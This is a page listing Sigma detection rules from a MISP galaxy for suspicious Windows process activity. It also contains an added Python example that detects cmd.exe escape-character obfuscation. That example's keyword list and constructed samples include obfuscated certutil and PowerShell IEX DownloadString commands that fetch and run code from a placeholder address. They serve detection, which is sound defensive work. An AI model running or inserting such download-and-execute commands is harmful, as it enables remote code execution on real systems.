| Metadata key | Value |
|---|---|
| author | Nasreddine Bencherchali (Nextron Systems) |
| creation_date | 2023-04-18 |
| falsepositive | ['Likelihood is related to how often the paths are used in the environment'] |
| filename | proc_creation_win_mstsc_run_local_rdp_file_susp_location.yml |
| level | high |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.command-and-control', 'attack.t1219.002'] |
Related clusters
To see the related clusters, click here.
New Port Forwarding Rule Added Via Netsh.EXE
Detects the execution of netsh commands that configure a new port forwarding (PortProxy) rule
Internal MISP references
UUID 322ed9ec-fcab-4f67-9a34-e7c6aef43614 which can be used as unique global reference for New Port Forwarding Rule Added Via Netsh.EXE in MISP communities and other software using the MISP galaxy
External references
- https://adepts.of0x.cc/netsh-portproxy-code/ - webarchive
- https://www.fireeye.com/blog/threat-research/2019/01/bypassing-network-restrictions-through-rdp-tunneling.html - webarchive
- https://www.dfirnotes.net/portproxy_detection/ - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_netsh_port_forwarding.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | Florian Roth (Nextron Systems), omkar72, oscd.community, Swachchhanda Shrawan Poudel |
| creation_date | 2019-01-29 |
| falsepositive | ['Legitimate administration activity', 'WSL2 network bridge PowerShell script used for WSL/Kubernetes/Docker (e.g. https://github.com/microsoft/WSL/issues/4150#issuecomment-504209723)'] |
| filename | proc_creation_win_netsh_port_forwarding.yml |
| level | medium |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.lateral-movement', 'attack.defense-evasion', 'attack.command-and-control', 'attack.t1090'] |
Related clusters
To see the related clusters, click here.
Suspicious Rundll32 Invoking Inline VBScript
Detects suspicious process related to rundll32 based on command line that invokes inline VBScript as seen being used by UNC2452
Internal MISP references
UUID 1cc50f3f-1fc8-4acf-b2e9-6f172e1fdebd which can be used as unique global reference for Suspicious Rundll32 Invoking Inline VBScript in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | Florian Roth (Nextron Systems) |
| creation_date | 2021-03-05 |
| falsepositive | ['Unknown'] |
| filename | proc_creation_win_rundll32_inline_vbs.yml |
| level | high |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.privilege-escalation', 'attack.defense-evasion', 'attack.t1055'] |
Related clusters
To see the related clusters, click here.
Remote PowerShell Session Host Process (WinRM)
Detects remote PowerShell sessions by monitoring for wsmprovhost (WinRM host process) as a parent or child process (sign of an active PowerShell remote session).
Internal MISP references
UUID 734f8d9b-42b8-41b2-bcf5-abaf49d5a3c8 which can be used as unique global reference for Remote PowerShell Session Host Process (WinRM) in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | Roberto Rodriguez @Cyb3rWard0g |
| creation_date | 2019-09-12 |
| falsepositive | ['Legitimate usage of remote Powershell, e.g. for monitoring purposes.'] |
| filename | proc_creation_win_winrm_remote_powershell_session_process.yml |
| level | medium |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.execution', 'attack.lateral-movement', 'attack.t1059.001', 'attack.t1021.006'] |
Related clusters
To see the related clusters, click here.
HackTool - Empire PowerShell Launch Parameters
Detects suspicious powershell command line parameters used in Empire
Internal MISP references
UUID 79f4ede3-402e-41c8-bc3e-ebbf5f162581 which can be used as unique global reference for HackTool - Empire PowerShell Launch Parameters in MISP communities and other software using the MISP galaxy
External references
- https://github.com/EmpireProject/Empire/blob/e37fb2eef8ff8f5a0a689f1589f424906fe13055/lib/modules/powershell/persistence/powerbreach/resolver.py#L178 - webarchive
- https://github.com/EmpireProject/Empire/blob/c2ba61ca8d2031dad0cfc1d5770ba723e8b710db/lib/common/helpers.py#L165 - webarchive
- https://github.com/EmpireProject/Empire/blob/e37fb2eef8ff8f5a0a689f1589f424906fe13055/lib/modules/powershell/persistence/powerbreach/deaduser.py#L191 - webarchive
- https://github.com/EmpireProject/Empire/blob/e37fb2eef8ff8f5a0a689f1589f424906fe13055/data/module_source/privesc/Invoke-EventVwrBypass.ps1#L64 - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_empire_powershell_launch.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | Florian Roth (Nextron Systems) |
| creation_date | 2019-04-20 |
| falsepositive | ['Other tools that incidentally use the same command line parameters'] |
| filename | proc_creation_win_hktl_empire_powershell_launch.yml |
| level | high |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.execution', 'attack.t1059.001'] |
Related clusters
To see the related clusters, click here.
Terminal Service Process Spawn
Detects a process spawned by the terminal service server process (this could be an indicator for an exploitation of CVE-2019-0708)
Internal MISP references
UUID 1012f107-b8f1-4271-af30-5aed2de89b39 which can be used as unique global reference for Terminal Service Process Spawn in MISP communities and other software using the MISP galaxy
External references
- https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/rdp-stands-for-really-do-patch-understanding-the-wormable-rdp-vulnerability-cve-2019-0708/ - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_svchost_termserv_proc_spawn.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | Florian Roth (Nextron Systems) |
| creation_date | 2019-05-22 |
| falsepositive | ['Unknown'] |
| filename | proc_creation_win_svchost_termserv_proc_spawn.yml |
| level | high |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.initial-access', 'attack.t1190', 'attack.lateral-movement', 'attack.t1210', 'car.2013-07-002'] |
Related clusters
To see the related clusters, click here.
HackTool - Certipy Execution
Detects Certipy execution, a tool for Active Directory Certificate Services enumeration and abuse based on PE metadata characteristics and common command line arguments.
Internal MISP references
UUID 6938366d-8954-4ddc-baff-c830b3ba8fcd which can be used as unique global reference for HackTool - Certipy Execution in MISP communities and other software using the MISP galaxy
External references
- https://research.ifcr.dk/certipy-4-0-esc9-esc10-bloodhound-gui-new-authentication-and-request-methods-and-more-7237d88061f7 - webarchive
- https://github.com/ly4k/Certipy - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_certipy.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | pH-T (Nextron Systems), Sittikorn Sangrattanapitak |
| creation_date | 2023-04-17 |
| falsepositive | ['Unlikely'] |
| filename | proc_creation_win_hktl_certipy.yml |
| level | high |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.discovery', 'attack.credential-access', 'attack.t1649'] |
Related clusters
To see the related clusters, click here.
Suspicious UltraVNC Execution
Detects a suspicious UltraVNC command line flag combination that indicates an auto reconnect upon execution, e.g. at startup (as seen being used by the Gamaredon threat group)
Internal MISP references
UUID 871b9555-69ca-4993-99d3-35a59f9f3599 which can be used as unique global reference for Suspicious UltraVNC Execution in MISP communities and other software using the MISP galaxy
External references
- https://web.archive.org/web/20220224045756/https://www.ria.ee/sites/default/files/content-editors/kuberturve/tale_of_gamaredon_infection.pdf - webarchive
- https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/shuckworm-gamaredon-espionage-ukraine - webarchive
- https://unit42.paloaltonetworks.com/unit-42-title-gamaredon-group-toolset-evolution - webarchive
- https://uvnc.com/docs/uvnc-viewer/52-ultravnc-viewer-commandline-parameters.html - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_ultravnc_susp_execution.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | Bhabesh Raj |
| creation_date | 2022-03-04 |
| falsepositive | ['Unknown'] |
| filename | proc_creation_win_ultravnc_susp_execution.yml |
| level | high |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.lateral-movement', 'attack.g0047', 'attack.t1021.005'] |
Related clusters
To see the related clusters, click here.
Lolbin Unregmp2.exe Use As Proxy
Detects usage of the "unregmp2.exe" binary as a proxy to launch a custom version of "wmpnscfg.exe"
Internal MISP references
UUID 727454c0-d851-48b0-8b89-385611ab0704 which can be used as unique global reference for Lolbin Unregmp2.exe Use As Proxy in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | frack113 |
| creation_date | 2022-12-29 |
| falsepositive | ['Unknown'] |
| filename | proc_creation_win_lolbin_unregmp2.yml |
| level | medium |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.defense-evasion', 'attack.t1218'] |
Related clusters
To see the related clusters, click here.
Cloudflared Tunnel Execution
Detects execution of the "cloudflared" tool to connect back to a tunnel. This was seen used by threat actors to maintain persistence and remote access to compromised networks.
Internal MISP references
UUID 9a019ffc-3580-4c9d-8d87-079f7e8d3fd4 which can be used as unique global reference for Cloudflared Tunnel Execution in MISP communities and other software using the MISP galaxy
External references
- https://developers.cloudflare.com/cloudflare-one/connections/connect-apps - webarchive
- https://github.com/cloudflare/cloudflared - webarchive
- https://blog.reconinfosec.com/emergence-of-akira-ransomware-group - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_cloudflared_tunnel_run.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | Janantha Marasinghe, Nasreddine Bencherchali (Nextron Systems) |
| creation_date | 2023-05-17 |
| falsepositive | ['Legitimate usage of Cloudflared tunnel.'] |
| filename | proc_creation_win_cloudflared_tunnel_run.yml |
| level | medium |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.command-and-control', 'attack.t1102', 'attack.t1090', 'attack.t1572'] |
Related clusters
To see the related clusters, click here.
Findstr GPP Passwords
Look for the encrypted cpassword value within Group Policy Preference files on the Domain Controller. This value can be decrypted with gpp-decrypt.
Internal MISP references
UUID 91a2c315-9ee6-4052-a853-6f6a8238f90d which can be used as unique global reference for Findstr GPP Passwords in MISP communities and other software using the MISP galaxy
External references
- https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1552.006/T1552.006.md#atomic-test-1---gpp-passwords-findstr - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_findstr_gpp_passwords.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | frack113 |
| creation_date | 2021-12-27 |
| falsepositive | ['Unknown'] |
| filename | proc_creation_win_findstr_gpp_passwords.yml |
| level | high |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.credential-access', 'attack.t1552.006'] |
Related clusters
To see the related clusters, click here.
Renamed Remote Utilities RAT (RURAT) Execution
Detects execution of renamed Remote Utilities (RURAT) via the Product PE header field
Internal MISP references
UUID 9ef27c24-4903-4192-881a-3adde7ff92a5 which can be used as unique global reference for Renamed Remote Utilities RAT (RURAT) Execution in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | Nasreddine Bencherchali (Nextron Systems) |
| creation_date | 2022-09-19 |
| falsepositive | ['Unknown'] |
| filename | proc_creation_win_renamed_rurat.yml |
| level | medium |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.defense-evasion', 'attack.collection', 'attack.command-and-control', 'attack.discovery', 'attack.s0592'] |
WhoAmI as Parameter
Detects a suspicious process command line that uses whoami as first parameter (as e.g. used by EfsPotato)
Internal MISP references
UUID e9142d84-fbe0-401d-ac50-3e519fb00c89 which can be used as unique global reference for WhoAmI as Parameter in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | Florian Roth (Nextron Systems) |
| creation_date | 2021-11-29 |
| falsepositive | ['Unknown'] |
| filename | proc_creation_win_susp_whoami_as_param.yml |
| level | high |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.discovery', 'attack.t1033', 'car.2016-03-001'] |
Related clusters
To see the related clusters, click here.
Explorer NOUACCHECK Flag
Detects suspicious starts of explorer.exe that use the /NOUACCHECK flag, which allows all sub-processes of that newly started explorer.exe to run without any UAC checks
Internal MISP references
UUID 534f2ef7-e8a2-4433-816d-c91bccde289b which can be used as unique global reference for Explorer NOUACCHECK Flag in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | Florian Roth (Nextron Systems) |
| creation_date | 2022-02-23 |
| falsepositive | ['Domain Controller User Logon', 'Unknown how many legitimate software products use that method'] |
| filename | proc_creation_win_explorer_nouaccheck.yml |
| level | high |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.privilege-escalation', 'attack.defense-evasion', 'attack.t1548.002'] |
Related clusters
To see the related clusters, click here.
HackTool - Sliver C2 Implant Activity Pattern
Detects process activity patterns as seen being used by Sliver C2 framework implants
Internal MISP references
UUID 42333b2c-b425-441c-b70e-99404a17170f which can be used as unique global reference for HackTool - Sliver C2 Implant Activity Pattern in MISP communities and other software using the MISP galaxy
External references
- https://github.com/BishopFox/sliver/blob/79f2d48fcdfc2bee4713b78d431ea4b27f733f30/implant/sliver/shell/shell_windows.go#L36 - webarchive
- https://www.microsoft.com/security/blog/2022/08/24/looking-for-the-sliver-lining-hunting-for-emerging-command-and-control-frameworks/ - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_sliver_c2_execution_pattern.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | Nasreddine Bencherchali (Nextron Systems), Florian Roth (Nextron Systems) |
| creation_date | 2022-08-25 |
| falsepositive | ['Unlikely'] |
| filename | proc_creation_win_hktl_sliver_c2_execution_pattern.yml |
| level | critical |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.execution', 'attack.t1059'] |
Related clusters
To see the related clusters, click here.
Using SettingSyncHost.exe as LOLBin
Detects using SettingSyncHost.exe to run a hijacked binary
Internal MISP references
UUID b2ddd389-f676-4ac4-845a-e00781a48e5f which can be used as unique global reference for Using SettingSyncHost.exe as LOLBin in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | Anton Kutepov, oscd.community |
| creation_date | 2020-02-05 |
| falsepositive | ['Unknown'] |
| filename | proc_creation_win_lolbin_settingsynchost.yml |
| level | high |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.privilege-escalation', 'attack.persistence', 'attack.execution', 'attack.defense-evasion', 'attack.t1574.008'] |
Related clusters
To see the related clusters, click here.
Suspicious PowerShell IEX Execution Patterns
Detects suspicious ways to run Invoke-Expression using the IEX alias
Internal MISP references
UUID 09576804-7a05-458e-a817-eb718ca91f54 which can be used as unique global reference for Suspicious PowerShell IEX Execution Patterns in MISP communities and other software using the MISP galaxy
External references
- https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.utility/invoke-expression?view=powershell-7.2 - webarchive
- https://www.huntress.com/blog/slashandgrab-screen-connect-post-exploitation-in-the-wild-cve-2024-1709-cve-2024-1708 - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_iex_patterns.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems) |
| creation_date | 2022-03-24 |
| falsepositive | ['Legitimate scripts that use IEX'] |
| filename | proc_creation_win_powershell_iex_patterns.yml |
| level | high |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.execution', 'attack.t1059.001'] |
Related clusters
To see the related clusters, click here.
Suspicious WMIC Execution Via Office Process
Office application called wmic to proxy execution through a LOLBIN process. This is often used to break a suspicious parent-child chain (Office app spawns LOLBin).
Internal MISP references
UUID e1693bc8-7168-4eab-8718-cdcaa68a1738 which can be used as unique global reference for Suspicious WMIC Execution Via Office Process in MISP communities and other software using the MISP galaxy
External references
- https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/ - webarchive
- https://github.com/vadim-hunter/Detection-Ideas-Rules/blob/02bcbfc2bfb8b4da601bb30de0344ae453aa1afe/Threat%20Intelligence/The%20DFIR%20Report/20210329_Sodinokibi_(aka_REvil)_Ransomware.yaml - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wmic_susp_execution_via_office_process.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | Vadim Khrykov, Cyb3rEng |
| creation_date | 2021-08-23 |
| falsepositive | ['Unknown'] |
| filename | proc_creation_win_wmic_susp_execution_via_office_process.yml |
| level | high |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.t1204.002', 'attack.t1047', 'attack.t1218.010', 'attack.execution', 'attack.defense-evasion'] |
Related clusters
To see the related clusters, click here.
Windows Shell/Scripting Processes Spawning Suspicious Programs
Detects suspicious child processes of Windows shell and scripting processes such as wscript, rundll32, powershell, mshta, etc.
Internal MISP references
UUID 3a6586ad-127a-4d3b-a677-1e6eacdf8fde which can be used as unique global reference for Windows Shell/Scripting Processes Spawning Suspicious Programs in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | Florian Roth (Nextron Systems), Tim Shelton |
| creation_date | 2018-04-06 |
| falsepositive | ['Administrative scripts', 'Microsoft SCCM'] |
| filename | proc_creation_win_susp_shell_spawn_susp_program.yml |
| level | high |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.execution', 'attack.defense-evasion', 'attack.t1059.005', 'attack.t1059.001', 'attack.t1218'] |
Related clusters
To see the related clusters, click here.
Potentially Suspicious WebDAV LNK Execution
Detects possible execution via LNK file accessed on a WebDAV server.
Internal MISP references
UUID 1412aa78-a24c-4abd-83df-767dfb2c5bbe which can be used as unique global reference for Potentially Suspicious WebDAV LNK Execution in MISP communities and other software using the MISP galaxy
External references
- https://www.trellix.com/en-us/about/newsroom/stories/research/beyond-file-search-a-novel-method.html - webarchive
- https://micahbabinski.medium.com/search-ms-webdav-and-chill-99c5b23ac462 - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_webdav_lnk_execution.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | Micah Babinski |
| creation_date | 2023-08-21 |
| falsepositive | ['Unknown'] |
| filename | proc_creation_win_webdav_lnk_execution.yml |
| level | medium |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.execution', 'attack.t1059.001', 'attack.t1204'] |
Related clusters
To see the related clusters, click here.
Msxsl.EXE Execution
Detects the execution of the MSXSL utility. This can be used to execute Extensible Stylesheet Language (XSL) files. These files are commonly used to describe the processing and rendering of data within XML files. Adversaries can abuse this functionality to execute arbitrary files while potentially bypassing application whitelisting defenses.
Internal MISP references
UUID 9e50a8b3-dd05-4eb8-9153-bdb6b79d50b0 which can be used as unique global reference for Msxsl.EXE Execution in MISP communities and other software using the MISP galaxy
External references
- https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1220/T1220.md - webarchive
- https://lolbas-project.github.io/lolbas/OtherMSBinaries/Msxsl/ - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_msxsl_execution.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | Timur Zinniatullin, oscd.community |
| creation_date | 2019-10-21 |
| falsepositive | ['Msxsl is not installed by default and is deprecated, so unlikely on most systems.'] |
| filename | proc_creation_win_msxsl_execution.yml |
| level | medium |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.defense-evasion', 'attack.t1220'] |
Related clusters
To see the related clusters, click here.
Wab Execution From Non Default Location
Detects execution of wab.exe (Windows Contacts) and Wabmig.exe (Microsoft Address Book Import Tool) from non-default locations, as seen with Bumblebee activity
Internal MISP references
UUID 395907ee-96e5-4666-af2e-2ca91688e151 which can be used as unique global reference for Wab Execution From Non Default Location in MISP communities and other software using the MISP galaxy
External references
- https://thedfirreport.com/2022/09/26/bumblebee-round-two/ - webarchive
- https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/bumblebee-loader-cybercrime - webarchive
- https://thedfirreport.com/2022/08/08/bumblebee-roasts-its-way-to-domain-admin/ - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wab_execution_from_non_default_location.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | Nasreddine Bencherchali (Nextron Systems) |
| creation_date | 2022-08-12 |
| falsepositive | ['Unknown'] |
| filename | proc_creation_win_wab_execution_from_non_default_location.yml |
| level | high |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.defense-evasion', 'attack.execution'] |
New ActiveScriptEventConsumer Created Via Wmic.EXE
Detects WMIC executions in which an event consumer gets created. This could be used to establish persistence
Internal MISP references
UUID ebef4391-1a81-4761-a40a-1db446c0e625 which can be used as unique global reference for New ActiveScriptEventConsumer Created Via Wmic.EXE in MISP communities and other software using the MISP galaxy
External references
- https://twitter.com/johnlatwc/status/1408062131321270282?s=12 - webarchive
- https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/wp-windows-management-instrumentation.pdf - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wmic_eventconsumer_creation.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | Florian Roth (Nextron Systems) |
| creation_date | 2021-06-25 |
| falsepositive | ['Legitimate software creating script event consumers'] |
| filename | proc_creation_win_wmic_eventconsumer_creation.yml |
| level | high |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.privilege-escalation', 'attack.persistence', 'attack.t1546.003'] |
Related clusters
To see the related clusters, click here.
Suspicious Process Suspension via WERFaultSecure through EDR-Freeze
Detects attempts to freeze a process, typically an EDR or anti-malware service, via EDR-Freeze, which abuses WerFaultSecure.exe to suspend security software.
Internal MISP references
UUID 1f0b4cac-9c81-41f4-95d0-8475ff46b3e2 which can be used as unique global reference for Suspicious Process Suspension via WERFaultSecure through EDR-Freeze in MISP communities and other software using the MISP galaxy
External references
- https://github.com/TwoSevenOneT/EDR-Freeze/blob/a7f61030b36fbde89871f393488f7075d2aa89f6/EDR-Freeze.cpp#L53 - webarchive
- https://www.zerosalarium.com/2025/09/EDR-Freeze-Puts-EDRs-Antivirus-Into-Coma.html - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_werfaultsecure_process_freeze.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | Jason (https://github.com/0xbcf) |
| creation_date | 2025-09-23 |
| falsepositive | ['Legitimate usage of WerFaultSecure for debugging purposes'] |
| filename | proc_creation_win_werfaultsecure_process_freeze.yml |
| level | high |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.defense-evasion', 'attack.t1562.001'] |
Related clusters
To see the related clusters, click here.
Potential Commandline Obfuscation Using Escape Characters
Detects potential commandline obfuscation using known escape characters
Internal MISP references
UUID f0cdd048-82dc-4f7a-8a7a-b87a52b6d0fd which can be used as unique global reference for Potential Commandline Obfuscation Using Escape Characters in MISP communities and other software using the MISP galaxy
External references
- https://twitter.com/Hexacorn/status/885570278637678592 - webarchive
- https://web.archive.org/web/20190213114956/http://www.windowsinspired.com/understanding-the-command-line-string-and-arguments-received-by-a-windows-program/ - webarchive
- https://twitter.com/Hexacorn/status/885553465417756673 - webarchive
- https://www.mandiant.com/resources/blog/obfuscation-wild-targeted-attackers-lead-way-evasion-techniques - webarchive
- https://twitter.com/vysecurity/status/885545634958385153 - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_cli_obfuscation_escape_char.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | juju4 |
| creation_date | 2018-12-11 |
| falsepositive | ['Unknown'] |
| filename | proc_creation_win_susp_cli_obfuscation_escape_char.yml |
| level | medium |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.defense-evasion', 'attack.t1140'] |
Related clusters
To see the related clusters, click here.
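The rule above matches fixed patterns such as a caret or quote inserted between the letters of `http`. The following added example (not code from the Sigma rule or the MISP galaxy) shows the underlying idea in a more general form: undo the two cmd.exe behaviours the references describe (outside double quotes a caret escapes the next character, and the quote characters themselves are removed by the child's argument parser) and then report keywords that are present only after normalisation. The keyword list and the sample command lines are constructed for this example; the normaliser is a simplification of cmd.exe parsing, not a full reimplementation.

```python
"""Normalise cmd.exe escape-character obfuscation before keyword matching.

Added example, not code from the Sigma rule or the MISP galaxy.  Models two
cmd.exe behaviours: outside double quotes `^x` reaches the child as `x`
(`p^o^w^e^r` -> `power`), and quote characters are stripped by the child's
argument parser (`h"t"t"p` -> `http`).  Sample command lines are constructed.
"""
from typing import Dict, List

# Illustrative keyword list (an assumption of this example, not the rule's list).
SUSPICIOUS_TOKENS = ["http", "powershell", "certutil", "bitsadmin", "iex", "downloadstring"]


def normalize_cmdline(cmdline: str) -> str:
    """Return the command line roughly as the child process would see it."""
    out: List[str] = []
    in_quotes = False
    i = 0
    while i < len(cmdline):
        ch = cmdline[i]
        if ch == '"':
            in_quotes = not in_quotes          # quotes toggle state and are dropped
        elif ch == "^" and not in_quotes:
            i += 1                             # caret: take the next char literally
            if i < len(cmdline):
                out.append(cmdline[i])
        else:
            out.append(ch)
        i += 1
    return "".join(out)


def escape_char_report(cmdline: str) -> Dict[str, object]:
    """Flag keywords that only become visible once escapes/quotes are removed."""
    normalized = normalize_cmdline(cmdline)
    raw_lower, norm_lower = cmdline.lower(), normalized.lower()
    revealed = [t for t in SUSPICIOUS_TOKENS if t in norm_lower and t not in raw_lower]
    return {
        "normalized": normalized,
        "escapes_removed": len(cmdline) - len(normalized),
        "revealed": revealed,
        "suspicious": bool(revealed),
    }


# Constructed process-creation command lines (198.51.100.7 is a documentation address).
SAMPLES = [
    "cmd.exe /c c^e^r^t^u^t^i^l -urlcache -split -f h^t^t^p://198.51.100.7/a.exe a.exe",
    'cmd.exe /c "p"o"w"e"r"s"h"e"l"l -nop -w hidden -c "IEX (New-Object Net.WebClient)'
    ".DownloadString('h\"t\"t\"p://198.51.100.7/s')\"",
    'cmd.exe /c "C:\\Program Files\\Vendor\\tool.exe" --update',   # benign quoting
]

if __name__ == "__main__":
    for line in SAMPLES:
        report = escape_char_report(line)
        print(report["suspicious"], report["revealed"], report["normalized"])
```

The third sample shows the main false-positive class: legitimate quoting is also removed, but it reveals no keyword, so only a keyword that was split by carets or quotes produces a hit.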
File Download And Execution Via IEExec.EXE
Detects execution of the IEExec utility to download and execute files
Internal MISP references
UUID 9801abb8-e297-4dbf-9fbd-57dde0e830ad which can be used as unique global reference for File Download And Execution Via IEExec.EXE in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | Nasreddine Bencherchali (Nextron Systems) |
| creation_date | 2022-05-16 |
| falsepositive | ['Unknown'] |
| filename | proc_creation_win_ieexec_download.yml |
| level | high |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.command-and-control', 'attack.t1105'] |
Related clusters
To see the related clusters, click here.
Potential Defense Evasion Activity Via Emoji Usage In CommandLine - 1
Detects the usage of emojis in the command line, which could be a sign of defense evasion activity.
Internal MISP references
UUID 4a30ac0c-b9d6-4e01-b71a-5f851bbf4259 which can be used as unique global reference for Potential Defense Evasion Activity Via Emoji Usage In CommandLine - 1 in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | @Kostastsale, TheDFIRReport |
| creation_date | 2022-12-05 |
| falsepositive | ['Unknown'] |
| filename | proc_creation_win_susp_emoji_usage_in_cli_1.yml |
| level | high |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.defense-evasion'] |
Sdclt Child Processes
A general detection for sdclt.exe spawning new processes. This could be an indicator of sdclt being used in UAC bypass techniques.
Internal MISP references
UUID da2738f2-fadb-4394-afa7-0a0674885afa which can be used as unique global reference for Sdclt Child Processes in MISP communities and other software using the MISP galaxy
External references
- https://github.com/OTRF/detection-hackathon-apt29/issues/6 - webarchive
- https://github.com/OTRF/ThreatHunter-Playbook/blob/2d4257f630f4c9770f78d0c1df059f891ffc3fec/docs/evals/apt29/detections/3.B.2_C36B49B5-DF58-4A34-9FE9-56189B9DEFEA.md - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sdclt_child_process.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research) |
| creation_date | 2020-05-02 |
| falsepositive | ['Unknown'] |
| filename | proc_creation_win_sdclt_child_process.yml |
| level | medium |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.defense-evasion', 'attack.privilege-escalation', 'attack.t1548.002'] |
Related clusters
To see the related clusters, click here.
Cab File Extraction Via Wusa.EXE From Potentially Suspicious Paths
Detects the execution of the "wusa.exe" (Windows Update Standalone Installer) utility to extract ".cab" files using the "/extract" argument from potentially suspicious paths.
Internal MISP references
UUID c74c0390-3e20-41fd-a69a-128f0275a5ea which can be used as unique global reference for Cab File Extraction Via Wusa.EXE From Potentially Suspicious Paths in MISP communities and other software using the MISP galaxy
External references
- https://web.archive.org/web/20180331144337/https://www.fireeye.com/blog/threat-research/2018/03/sanny-malware-delivery-method-updated-in-recently-observed-attacks.html - webarchive
- https://www.echotrail.io/insights/search/wusa.exe/ - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wusa_cab_files_extraction_from_susp_paths.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | Nasreddine Bencherchali (Nextron Systems) |
| creation_date | 2022-08-05 |
| falsepositive | ['Unknown'] |
